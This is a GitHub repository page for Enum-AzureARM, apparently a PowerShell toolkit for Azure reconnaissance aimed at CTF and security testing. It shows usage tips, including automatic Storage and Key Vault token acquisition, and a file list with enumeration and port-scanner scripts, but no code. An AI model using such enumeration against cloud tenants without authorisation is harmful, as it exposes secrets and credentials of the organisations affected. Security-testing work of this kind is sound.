Add -Verbose to see detailed progress and troubleshooting info
Use -AllowNoSubscription for Graph-only enumeration when ARM access is limited
Service principal mode gets Storage + Key Vault tokens automatically!
Smart subscription selection prevents accidental enumeration of test environments

Made with ☕ and 90% using AI with nice prompts, including most of this fancy documentation

Name		Name	Last commit message	Last commit date
Latest commit History 41 Commits
.gitignore		.gitignore
Enhanced-CTF-Enumeration.ps1		Enhanced-CTF-Enumeration.ps1
Enum-AzureARM.ps1		Enum-AzureARM.ps1
Get-AppConfigValue.ps1		Get-AppConfigValue.ps1
LICENSE		LICENSE
Quick-CTF-Test.ps1		Quick-CTF-Test.ps1
README.md		README.md
create-script-without-gui.ps1		create-script-without-gui.ps1
port-scanner-minimal.ps1		port-scanner-minimal.ps1
port-scanner.ps1		port-scanner.ps1
sa-get-simple.ps1		sa-get-simple.ps1

License

oscarintherocks/Enum-AzureARM

Folders and files

Latest commit

History

Repository files navigation